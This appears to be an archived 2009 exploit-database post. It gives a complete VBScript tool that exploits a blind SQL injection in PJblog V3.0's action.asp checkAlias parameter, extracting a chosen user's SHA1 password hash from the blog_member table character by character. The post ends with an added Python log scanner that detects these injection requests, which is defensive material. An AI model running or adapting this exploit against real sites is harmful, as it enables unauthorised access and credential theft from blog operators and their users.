PJblog V3.0 0day: VBS version of the exploit tool

2009-04-23T00:00:00
ID MYHACK58:62200923024
Type myhack58
Reporter Anonymous
Modified 2009-04-23T00:00:00

Description

For vulnerability details, see <http://0kee.com/read.php?tid-908.html>. I don't have PHP installed on my computer, so I wrote a VBS version of the exploit tool. The code is as follows:

```vbscript
If WScript.Arguments.Count <> 2 Then
    WScript.Echo "Usage: Cscript.exe Exp.vbs to detect the forum URL you want to detect the user name"
    WScript.Echo "Example: Cscript.exe Exp.vbs http://www.pjhome.net puterjam"
    WScript.Quit
End If

attackUrl = WScript.Arguments(0)
attackUser = WScript.Arguments(1)
attackUrl = Replace(attackUrl, "\", "/")
If Right(attackUrl, 1) <> "/" Then
    attackUrl = attackUrl & "/"
End If
SHA1Charset = "0123456789ABCDEFJ"
strHoleUrl = attackUrl & "action.asp?action=checkAlias&cname=0kee"""

' Boolean check: a true condition and a false condition must give different answers
If IsSuccess(strHoleUrl & "or""1""=""1") And Not IsSuccess(strHoleUrl & "and""1""=""2") Then
    WScript.Echo "congratulations! The presence of vulnerability"
Else
    WScript.Echo "there is no vulnerability detected"
    WScript.Quit
End If

' Compare the stored SHA1 value one character at a time (40 positions)
For n = 1 To 40
    For i = 1 To 17
        strInject = strHoleUrl & " Or 0<(Select Count(*) From blog_member Where mem_name='" & attackUser & "' And mem_password>='" & strResult & Mid(SHA1Charset, i, 1) & "') And""1""=""1"
        If Not IsSuccess(strInject) Then
            strResult = strResult & Mid(SHA1Charset, i-1, 1)
            Exit For
        End If
        strPrint = Chr(13) & "Password(SHA1): " & strResult & Mid(SHA1Charset, i, 1)
        WScript.StdOut.Write strPrint
    Next
Next
WScript.Echo Chr(13) & Chr(10) & "Done!"

' Fetch a URL with GET and return the response body as a string
Function PostData(PostUrl)
    Dim Http
    Set Http = CreateObject("msxml2.serverXMLHTTP")
    With Http
        .Open "GET", PostUrl, False
        .Send ()
        PostData = .ResponseBody
    End With
    Set Http = Nothing
    PostData = bytes2BSTR(PostData)
End Function

' Convert the raw response bytes to a string (handles double-byte characters)
Function bytes2BSTR(vIn)
    Dim strReturn
    Dim I, ThisCharCode, NextCharCode
    strReturn = ""
    For I = 1 To LenB(vIn)
        ThisCharCode = AscB(MidB(vIn, I, 1))
        If ThisCharCode < &H80 Then
            strReturn = strReturn & Chr(ThisCharCode)
        Else
            NextCharCode = AscB(MidB(vIn, I + 1, 1))
            strReturn = strReturn & Chr(CLng(ThisCharCode) * &H100 + CInt(NextCharCode))
            I = I + 1
        End If
    Next
    bytes2BSTR = strReturn
End Function

' True when the response contains the "check_error" marker
Function IsSuccess(PostUrl)
    strData = PostData(PostUrl)
    'WScript.Echo strData
    If InStr(strData, "check_error") > 0 Then
        IsSuccess = True
    Else
        IsSuccess = False
    End If
    'WScript.Sleep 500 'let system rest.
End Function
```

Usage: Cscript.exe Exp.vbs <forum URL to check> <user name to check>
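For defenders, the request pattern this script produces (many `action.asp?action=checkAlias` requests from one client, each with a quote and SQL in `cname`) is easy to find in web server logs. The following is an added example, not part of the original post: the log field order, the IP addresses, the `demo` user name and the `burst` threshold are assumptions, and the sample lines are constructed.

```python
import re
from collections import Counter
from urllib.parse import unquote_plus

# Markers taken from the requests the script on this page sends: a quote that
# breaks out of cname, followed by SQL against the blog_member table.
SQLI = re.compile(r"""["']|\b(select|blog_member|mem_password)\b""", re.I)

def cname_of(query):
    """Decoded cname of an action=checkAlias query string, else None."""
    params = {k.lower(): v for k, _, v in
              (p.partition("=") for p in query.split("&"))}
    if params.get("action", "").lower() != "checkalias":
        return None
    return unquote_plus(params.get("cname", ""))

def scan(log_lines, burst=10):
    """Return {client_ip: hits} for clients with at least `burst` hits."""
    hits = Counter()
    for line in log_lines:
        fields = line.split()
        if line.startswith("#") or len(fields) < 7:
            continue
        _date, _time, ip, _method, stem, query, _status = fields[:7]
        if not stem.lower().endswith("/action.asp"):
            continue
        cname = cname_of(query)
        # One stray quote can be a typo; a burst from one client is the signal.
        if cname and SQLI.search(cname):
            hits[ip] += 1
    return {ip: n for ip, n in hits.items() if n >= burst}

# Constructed sample, not real traffic. Assumed field order:
# date time c-ip cs-method cs-uri-stem cs-uri-query sc-status
PROBE = ("2009-04-23 10:00:{:02d} 203.0.113.9 GET /blog/action.asp "
         "action=checkAlias&cname=0kee%22+Or+0<(Select+Count(*)+From+"
         "blog_member+Where+mem_name='demo'+And+mem_password>='{}')"
         "+And%221%22=%221 200")
SAMPLE = [PROBE.format(i, c) for i, c in enumerate("0123456789ABCDEF")]
SAMPLE.append("2009-04-23 10:01:00 198.51.100.7 GET /blog/action.asp "
              "action=checkAlias&cname=my-alias 200")

if __name__ == "__main__":
    for ip, n in scan(SAMPLE).items():
        print(f"{ip}: {n} suspicious checkAlias requests")
```

Adjust the field unpacking to the `#Fields:` header of the real log before use; IIS writes spaces in the query as `+`, which `unquote_plus` restores.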

from:<http://www.pcsec.org/archives/Pjblog-v3-0day-exp-vbs.html>